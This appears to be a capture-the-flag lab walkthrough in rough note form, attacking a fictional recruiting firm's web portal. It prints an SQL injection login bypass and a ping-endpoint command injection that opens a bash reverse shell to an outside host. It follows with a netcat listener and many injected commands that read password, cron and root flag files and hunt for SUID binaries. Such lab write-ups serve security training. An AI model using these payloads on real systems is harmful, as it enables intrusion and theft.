Walkthrough
Room Description: You are up for promotion at Hadron Security. Your senior lead, Mara, has handed you a solo engagement against RecruitCorp, a small recruiting firm with a public-facing portal. Compromise the host, capture the flags, and demonstrate that you are ready for the Penetration Tester title.
System Info: Parrot OS 7.2 VMWare Workstation Player
- NMAP Scan
1)
- GOBUSTER Scan
1)
- Browse to admin portal found in GoBuster Scan

- I attempted to login using basic credentials with no luck
- I then attempted SQL Injection
admin' OR '1'='1' --
- Attempted user lookup and noticed potential PHP exploit for root access
- root:x:0:0:root:/root:/bin/bash
- jford:x:1001:1001::/home/jford:/bin/bash
- Reverse Shell?
curl -b "PHPSESSID=your_actual_session_id"
"http://10.144.135.34/admin/sysmaint-checks/ping.php?host=;bash+-c+'bash+-i+>%26+/dev/tcp/192.168.133.226/4444+0>%261'"
`nc -lvnp 4444`
`ip addr show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1`
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg export
TERM=xterm
?host=;find+/+-name+"user.txt"+2>/dev/null
?host=;find+/+-name+"root.txt"+2>/dev/null
host=;find+/home+-type+f+2>/dev/null
?host=;cat+/etc/crontab
?host=;ls+-la+/etc/cron*
?host=;ps+aux
?host=;find+/+-perm+-4000+-type+f+2>/dev/null
?host=;sudo+-l
?host=;ls+-la+/home/
?host=;grep+-v+"nologin\|false"+/etc/passwd
?host=;find+/+-name+"flag.txt"+2>/dev/null
?host=;find+/+-name+"*.txt"+/home+/root+2>/dev/null
?host=;cat+/root/root.txt
?host=;cat+/home/*/user.txt
?host=;ls+-la+/root/


